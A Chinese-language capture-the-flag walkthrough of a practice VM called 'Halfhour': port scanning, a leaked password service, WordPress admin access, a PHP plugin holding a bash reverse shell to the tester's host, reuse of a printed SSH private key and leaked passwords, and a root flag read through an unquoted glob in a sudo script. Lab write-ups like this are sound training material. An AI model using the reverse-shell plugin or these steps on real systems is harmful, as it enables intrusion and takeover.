Halfhour

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.1
Host is up (0.00052s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00040s latency).
MAC Address: 08:00:27:E4:01:05 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.14
Host is up (0.0011s latency).
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.22 seconds

靶机IP为：192.168.2.14

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.14
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
1338/tcp open  wmc-log-svc
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds

开放端口：22、80、1337、1338

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,1337,1338 192.168.2.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:41 CST
Nmap scan report for 192.168.2.14
Host is up (0.0012s latency).

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http         Apache httpd 2.4.62 ((Debian))
|_http-title: \xE6\xAD\xA3\xE5\x9C\xA8\xE8\xB7\xB3\xE8\xBD\xAC\xE5\x88\xB0 Maze 
|_http-server-header: Apache/2.4.62 (Debian)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Please enter password: Incorrect password. Attempts left: 2
|   NULL: 
|_    Please enter password:
1338/tcp open  wmc-log-svc?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Please send new password: 
|     Congratulations! Password reset successful!
|     password: bobobo
|   NULL: 
|_    Please send new password:
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.26 seconds

1. 22端口，ssh服务
2. 80端口，http服务
3. 1337、1338端口，未知的服务，在1338端口泄露一个密码bobobo

3.UDP端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.14                              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:45 CST
Nmap scan report for 192.168.2.14
Host is up (0.00060s latency).
All 100 scanned ports on 192.168.2.14 are in ignored states.
Not shown: 56 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.79 seconds

没有开放的udp端口

4.脚本漏洞扫描

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --script=vuln -p22,80,1337,1338 192.168.2.14              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 15:47 CST
Nmap scan report for 192.168.2.14
Host is up (0.00042s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
1337/tcp open  waste
1338/tcp open  wmc-log-svc
MAC Address: 08:00:27:F7:91:CD (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.58 seconds

没有有用的信息

二、漏洞利用与凭证获取

1、探测未知的端口

1.1337端口

使用nc连接1377端口

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: miao
Incorrect password. Attempts left: 2
miao
Incorrect password. Attempts left: 1
miao
Too many failed attempts. Reset password? (yes/no)yes
Please send new password to port 1338.

发现是一个密码验证服务，并提示可以在1338重置密码

2.1338端口

使用nc连接1338端口

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1338
Please send new password: miao
Congratulations! Password reset successful!
Old password: bobobo

提示密码重置成功，并返回旧的密码bobobo

再次访问1337端口，并输入重置的密码，发现密码依然是错误的

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: miao
Incorrect password. Attempts left: 2

尝试输入旧密码bobobo，提示密码正确，找到一个凭证bobobo

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc 192.168.2.14 1337
Please enter password: bobobo
Password correct!

2、web渗透-80端口

访问80端口服务，找到一个域名halfhour.dsz

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.14                                             
<!-- halfhour.dsz -->
...

将域名加入到hosts文件后再次访问，发现是wordpress框架搭建的服务

3、WordPress渗透

在您好，世界！里面找到一个用户名todd，结合刚才获取到的密码凭证bobobo，尝试登录后台

成功进入后台，WordPress版本为6.8.2

在插件处可以上传一个反弹shell的插件包，并且安装启用

WordPress反弹shell

<?php
/**
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI: 
 * Description: Reverse Shell Plugin for penetration testing.
 * Version: 1.0
 * Author: Security Analyst
 * Author URI: http://www.example.com
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'");
?>

三、获取www-data权限

在kali开启监听

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc -lvnp 4444       
listening on [any] 4444 ...

安装插件，并启用插件，成功获得shell

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nc -lvnp 4444       
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.14] 58048
bash: cannot set terminal process group (436): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Halfhour:/var/www/halfhour.dsz/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

获取稳定的shell

script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取nxal权限（兔子洞）

查看/home下面的目录，找到三个用户，但只对nxal用户具有权限

www-data@Halfhour:/home$ ls -la
total 20
drwxr-xr-x  5 root      root      4096 Sep 14 05:20 .
drwxr-xr-x 18 root      root      4096 Mar 18  2025 ..
drwxr-xr-x  3 nxal      nxal      4096 Sep 14 05:20 nxal
drwx------  2 wangjiang wangjiang 4096 Sep 14 05:55 wangjiang
drwx------  2 welcome   welcome   4096 Sep 14 05:26 welcome

在nxal用户下面找到ssh的私钥和公钥

www-data@Halfhour:/home/nxal/.ssh$ ls -la
total 16
drwxr-xr-x 2 nxal nxal 4096 Sep 14 05:15 .
drwxr-xr-x 3 nxal nxal 4096 Sep 14 05:20 ..
-rwxr-xr-x 1 nxal nxal 2602 Sep 14 05:15 id_rsa
-rwxr-xr-x 1 nxal nxal  567 Sep 14 05:15 id_rsa.pub

www-data@Halfhour:/home/nxal/.ssh$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----

使用nxal的私钥进行登录，成功获取到nxal的权限

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# chmod 600 id           

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# ssh nxal@192.168.2.14 -i id 
nxal@192.168.2.14's password: 
Linux Halfhour 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 14 05:50:25 2025 from 192.168.3.94
nxal@Halfhour:~$ id
uid=1001(nxal) gid=1001(nxal) groups=1001(nxal)

2、获取wangjiang权限

查看wordpress的配置文件，找到两个密码root123和your_strong_password

nxal@Halfhour:/var/www/halfhour.dsz$ cat wp-config.php 
...
/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
/* define( 'DB_PASSWORD', 'root123' ); */
define( 'DB_PASSWORD', 'your_strong_password' );

尝试登录，发现当用户为wangjiang，密码为root123时能成功登录

nxal@Halfhour:/var/www/halfhour.dsz$ su wangjiang
Password: 
wangjiang@Halfhour:/var/www/halfhour.dsz$ id
uid=1002(wangjiang) gid=1002(wangjiang) groups=1002(wangjiang)

3、获取welcome权限

查看wangjiang用户的家目录下面，找到.mysql_history文件

wangjiang@Halfhour:~$ ls -la
total 32
drwx------ 2 wangjiang wangjiang 4096 Sep 14 05:55 .
drwxr-xr-x 5 root      root      4096 Sep 14 05:20 ..
-rw-r--r-- 1 wangjiang wangjiang  220 Sep 14 05:20 .bash_logout
-rw-r--r-- 1 wangjiang wangjiang 3526 Sep 14 05:20 .bashrc
-rw------- 1 wangjiang wangjiang 1516 Sep 14 05:14 .mysql_history
-rw-r--r-- 1 root      root        23 Sep 14 05:24 note.txt
-rw-r--r-- 1 wangjiang wangjiang  807 Sep 14 05:20 .profile
-rw-r--r-- 1 root      root        44 Sep 14 05:14 user.txt

查看文件，发现welcome用户的密码4c850c5b3b2756e67a91bad8e046ddac

wangjiang@Halfhour:~$ cat .mysql_history 
....
INSERT\040INTO\040user\040(username,\040password)\040\040VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')\040ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password); show\040tables; select\040*\040from\040users; select\040*\040from\040user;

使用凭证获取welcome的权限

wangjiang@Halfhour:~$ su welcome
Password: 
welcome@Halfhour:/home/wangjiang$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

4、获取root权限

查看sudo权限，找到/usr/local/bin/del.sh不要密码即可执行

welcome@Halfhour:/home/wangjiang$ sudo -l
Matching Defaults entries for welcome on Halfhour:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Halfhour:
    (ALL) NOPASSWD: /usr/local/bin/del.sh

查看脚本内容

welcome@Halfhour:/usr/local/bin$ cat del.sh 
#!/bin/bash

PATH=/usr/bin
cd /tmp
cat /root/root.txt | tr -d [A-Za-z0-9]

解释脚本：
脚本的意图是读取 /root/root.txt 文件，然后通过tr -d [A-Za-z0-9]命令过滤掉所有的字母和数字，从而隐藏真正的Flag。
然而，该脚本存在一个严重的安全缺陷： tr 命令的参数 [A-Za-z0-9] 没有被引号包裹。这是一个典型的Shell路径名展开漏洞。

1. 当Shell执行 tr 命令时，它会先解析命令行参数。
2. 由于 [A-Za-z0-9] 未加引号，Shell会将其视为一个通配符，意为“匹配当前目录下任意一个由单个字母或数字组成的文件名”。
3. 脚本中 cd /tmp 命令将当前目录切换到了全局可写的 /tmp 目录。
4. 因此，我们可以在 /tmp 目录下创建一个文件名恰好能匹配该通配符的文件，例如 A 、 B 或1 。
5. 当脚本执行时，Shell在 /tmp 目录中找到了文件 A ，便会用文件名 A 替换掉通配符 [A-Zaz0-9] 。
6. 最终，实际执行的命令就从 tr -d [A-Za-z0-9] 变成了 tr -d A 。
   这样一来，原本要删除所有字母和数字的命令，就变成了只删除字符‘A’的命令。由于Flag中不包含大写字母’A’，因此Flag被完整地打印了出来。

构造链，成功获取到root的flag

welcome@Halfhour:/usr/local/bin$ cd /tmp
welcome@Halfhour:/tmp$ touch A
welcome@Halfhour:/tmp$ sudo /usr/local/bin/del.sh 
flag{root-4c850c5b3b2756e67a91bad8e046ddac}

其实root的密码为bobobo

welcome@Halfhour:/tmp$ su root
Password: 
root@Halfhour:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

root@Halfhour:/tmp# cat /home/wangjiang/user.txt /root/root.txt 
flag{user-4c850c5b3b2756e67a91bad8e046ddac}
flag{root-4c850c5b3b2756e67a91bad8e046ddac}